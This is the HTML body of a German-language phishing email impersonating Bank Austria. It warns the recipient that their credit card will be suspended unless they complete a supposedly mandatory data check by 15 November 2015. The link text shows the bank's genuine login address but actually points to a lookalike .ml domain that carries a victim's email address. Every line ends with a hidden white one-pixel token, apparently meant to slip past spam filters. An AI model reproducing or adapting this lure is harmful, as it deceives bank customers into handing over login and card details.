Guten Tag sehr geehrter Kunde, sehr geehrte Kundin, <font size="1" color="white">e578e0fda469e160</font> <br><p>
wir sind leider nicht in der Lage Ihre Kreditkarte in Zukunft weiterhin freizugeben, <font size="1" color="white">e578e0fda469e160</font> <br><p>
da Sie sich noch nicht Ihrem notwendigen Datenabgleich unterzogen haben. <font size="1" color="white">e578e0fda469e160</font> <br><p>
Dieser Datenabgleich ist seit dem 01. November 2015 bei jeden unserer Kunden verpflichtend erforderlich. <font size="1" color="white">e578e0fda469e160</font> <br><p>
Wenn Sie das Verfahren bis zum 15.11.2015 nicht passiert haben, <font size="1" color="white">e578e0fda469e160</font> <br><p>
wird Ihre Kreditkarte ausgesetzt und kann nicht mehr bei Zahlungen eingesetzt werden.<font size="1" color="white">e578e0fda469e160</font> <br><p>
Wir haben Ihnen ein Formular vorbereitet, tragen Sie dort Ihre Daten ein und beenden Sie den Vorgang,<font size="1" color="white">e578e0fda469e160</font> <br><p>
um einen Datenabgleich zu autorisieren:<font size="1" color="white">e578e0fda469e160</font> <br><p>
<a href="http://www.bankaustria.ml/e578e0fda469e160.rote_rueb_innen@gmx.at.html">https://online.bankaustria.at/wps/portal/userlogin</a><br>
Nach der Angabe Ihrer Daten ist kein weiteres Handeln notwendig.<font size="1" color="white">e578e0fda469e160</font> <br><p>
Vielen Dank!<font size="1" color="white">e578e0fda469e160</font> <br><p>